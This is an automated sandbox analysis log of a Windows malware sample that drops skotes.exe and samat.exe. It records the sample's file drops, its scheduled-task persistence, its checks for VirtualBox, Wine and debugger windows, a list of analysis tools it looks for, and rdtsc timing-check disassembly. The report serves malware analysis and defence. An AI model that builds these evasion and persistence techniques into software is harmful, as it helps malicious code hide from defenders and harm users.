                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_ghash_portable.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_SHA512.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_ofb.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI52282\_sqlite3.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI52282\_multiprocessing.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\PublicKey\_ed448.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_cbc.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI52282\pyexpat.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI52282\pywin32_system32\pywintypes313.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\PublicKey\_ec_ws.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI52282\libssl-3.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_BLAKE2s.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_cast.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_SHA256.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI52282\_decimal.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\PublicKey\_ed25519.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI52282\libcrypto-3.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\PublicKey\_curve25519.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI52282\_ssl.pydJump to dropped file
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_pkcs1_decode.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI52282\_queue.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_aesni.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_MD5.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_SHA384.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_Salsa20.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_MD4.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI52282\_socket.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI52282\win32\win32crypt.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_ghash_clmul.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_blowfish.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI52282\_cffi_backend.cp313-win_amd64.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI52282\_ctypes.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI52282\_wmi.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Util\_cpuid_c.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor\wheel-0.43.0.dist-info\LICENSE.txtJump to behavior

                    Boot Survival

                    barindex
                    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonclassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonclassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Tasks\skotes.jobJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 7_2_00007FF7E12C76C0 GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,7_2_00007FF7E12C76C0
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Source: C:\Windows\System32\dxdiag.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : ASSOCIATORS OF {Win32_DiskPartition.DeviceID=&quot;Disk #0, Partition #1&quot;} WHERE ResultClass = Win32_DiskDrive
                    Source: C:\Windows\System32\dxdiag.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_DiskDriveToDiskPartition where Dependent=&quot;Win32_DiskPartition.DeviceID=\&quot;Disk #0, Partition #1\&quot;&quot;
                    Source: C:\Windows\System32\dxdiag.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_LogicalDisk Where DriveType=3
                    Source: C:\Windows\System32\dxdiag.exeSystem information queried: FirmwareTableInformation
                    Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXE
                    Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: DXENSERVICE.EXE4P
                    Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OLLYDBG.EXE
                    Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: DWIRESHARK.EXE
                    Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: QEMU-GA.EXE
                    Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: VMUSRVC.EXE
                    Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: X64DBG.EXE
                    Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: DX64DBG.EXE
                    Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: DFIDDLER.EXE
                    Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: DOLLYDBG.EXE
                    Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: DQEMU-GA.EXE
                    Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: DVMUSRVC.EXE
                    Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: FIDDLER.EXE
                    Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: XENSERVICE.EXE
                    Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: DPROCESSHACKER.EXE
                    Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: WIRESHARK.EXE
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B1253 second address: 8B125F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jo 00007F8481503866h 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B125F second address: 8B1263 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B1651 second address: 8B1657 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B1657 second address: 8B165E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B165E second address: 8B1683 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F848150386Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8481503870h 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B1683 second address: 8B1691 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007F8480743926h 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B193C second address: 8B194C instructions: 0x00000000 rdtsc 0x00000002 jng 00007F8481503866h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B194C second address: 8B1962 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F848074392Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B1962 second address: 8B1968 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B1968 second address: 8B1977 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F8480743926h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B57E3 second address: 8B5813 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F848150386Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push edx 0x0000000e jmp 00007F8481503874h 0x00000013 pop edx 0x00000014 mov eax, dword ptr [eax] 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push eax 0x0000001a pop eax 0x0000001b pop eax 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B5813 second address: 8B5835 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F848074392Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d pushad 0x0000000e jmp 00007F848074392Bh 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B5835 second address: 8B5839 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B58CF second address: 8B58DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push ebx 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B5A5A second address: 8B5AAD instructions: 0x00000000 rdtsc 0x00000002 jo 00007F8481503866h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push eax 0x0000000e call 00007F8481503868h 0x00000013 pop eax 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 add dword ptr [esp+04h], 00000017h 0x00000020 inc eax 0x00000021 push eax 0x00000022 ret 0x00000023 pop eax 0x00000024 ret 0x00000025 xor cx, 77B8h 0x0000002a pushad 0x0000002b mov edx, dword ptr [ebp+122D35B4h] 0x00000031 movzx esi, cx 0x00000034 popad 0x00000035 push 00000000h 0x00000037 xor dword ptr [ebp+122D1F0Ch], esi 0x0000003d push E7EFC6E9h 0x00000042 push eax 0x00000043 push edx 0x00000044 pushad 0x00000045 js 00007F8481503866h 0x0000004b pushad 0x0000004c popad 0x0000004d popad 0x0000004e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B5AAD second address: 8B5AB2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B5AB2 second address: 8B5B0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 add dword ptr [esp], 18103997h 0x0000000e mov ecx, dword ptr [ebp+122D3868h] 0x00000014 push 00000003h 0x00000016 and cl, 00000032h 0x00000019 push 00000000h 0x0000001b mov dword ptr [ebp+122D19F8h], esi 0x00000021 push 00000003h 0x00000023 push 00000000h 0x00000025 push edx 0x00000026 call 00007F8481503868h 0x0000002b pop edx 0x0000002c mov dword ptr [esp+04h], edx 0x00000030 add dword ptr [esp+04h], 00000018h 0x00000038 inc edx 0x00000039 push edx 0x0000003a ret 0x0000003b pop edx 0x0000003c ret 0x0000003d mov dword ptr [ebp+122D1A2Fh], ebx 0x00000043 push BBD99289h 0x00000048 pushad 0x00000049 jbe 00007F8481503868h 0x0000004f push ebx 0x00000050 pop ebx 0x00000051 push ebx 0x00000052 push eax 0x00000053 push edx 0x00000054 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B5B83 second address: 8B5C26 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8480743926h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push ecx 0x00000011 call 00007F8480743928h 0x00000016 pop ecx 0x00000017 mov dword ptr [esp+04h], ecx 0x0000001b add dword ptr [esp+04h], 0000001Dh 0x00000023 inc ecx 0x00000024 push ecx 0x00000025 ret 0x00000026 pop ecx 0x00000027 ret 0x00000028 mov dword ptr [ebp+122D1878h], ecx 0x0000002e push 00000000h 0x00000030 push ebx 0x00000031 add edx, dword ptr [ebp+122D38A4h] 0x00000037 pop ecx 0x00000038 push ecx 0x00000039 xor edi, dword ptr [ebp+122D3718h] 0x0000003f pop ecx 0x00000040 call 00007F8480743929h 0x00000045 jmp 00007F8480743935h 0x0000004a push eax 0x0000004b jmp 00007F8480743930h 0x00000050 mov eax, dword ptr [esp+04h] 0x00000054 push esi 0x00000055 jp 00007F848074392Ch 0x0000005b pop esi 0x0000005c mov eax, dword ptr [eax] 0x0000005e pushad 0x0000005f jmp 00007F848074392Ch 0x00000064 jbe 00007F848074392Ch 0x0000006a push eax 0x0000006b push edx 0x0000006c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B5C26 second address: 8B5CAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp+04h], eax 0x00000009 push ecx 0x0000000a push esi 0x0000000b push eax 0x0000000c pop eax 0x0000000d pop esi 0x0000000e pop ecx 0x0000000f pop eax 0x00000010 push 00000000h 0x00000012 push ebp 0x00000013 call 00007F8481503868h 0x00000018 pop ebp 0x00000019 mov dword ptr [esp+04h], ebp 0x0000001d add dword ptr [esp+04h], 00000015h 0x00000025 inc ebp 0x00000026 push ebp 0x00000027 ret 0x00000028 pop ebp 0x00000029 ret 0x0000002a mov dword ptr [ebp+122D1E38h], edx 0x00000030 push 00000003h 0x00000032 call 00007F848150386Ah 0x00000037 movzx edx, dx 0x0000003a pop esi 0x0000003b push 00000000h 0x0000003d mov esi, 07D34AC9h 0x00000042 push 00000003h 0x00000044 push 00000000h 0x00000046 push ebp 0x00000047 call 00007F8481503868h 0x0000004c pop ebp 0x0000004d mov dword ptr [esp+04h], ebp 0x00000051 add dword ptr [esp+04h], 00000015h 0x00000059 inc ebp 0x0000005a push ebp 0x0000005b ret 0x0000005c pop ebp 0x0000005d ret 0x0000005e jmp 00007F8481503873h 0x00000063 push B13CA0F6h 0x00000068 push esi 0x00000069 push eax 0x0000006a push edx 0x0000006b pushad 0x0000006c popad 0x0000006d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D5CDE second address: 8D5CE3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D5CE3 second address: 8D5CE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8ACB19 second address: 8ACB45 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F8480743926h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d jno 00007F8480743926h 0x00000013 pushad 0x00000014 popad 0x00000015 pop esi 0x00000016 pop ebx 0x00000017 pushad 0x00000018 jmp 00007F8480743931h 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D3BB5 second address: 8D3BDF instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F8481503868h 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F8481503878h 0x0000000f js 00007F8481503866h 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D3BDF second address: 8D3BFD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jnc 00007F8480743926h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jnp 00007F8480743928h 0x00000016 push eax 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push ebx 0x0000001b pop ebx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D3BFD second address: 8D3C01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D3C01 second address: 8D3C07 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D3C07 second address: 8D3C18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F848150386Bh 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D3C18 second address: 8D3C1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D3EE0 second address: 8D3EE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D4012 second address: 8D401D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 push edi 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D401D second address: 8D4023 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D44F7 second address: 8D44FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D44FF second address: 8D4503 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
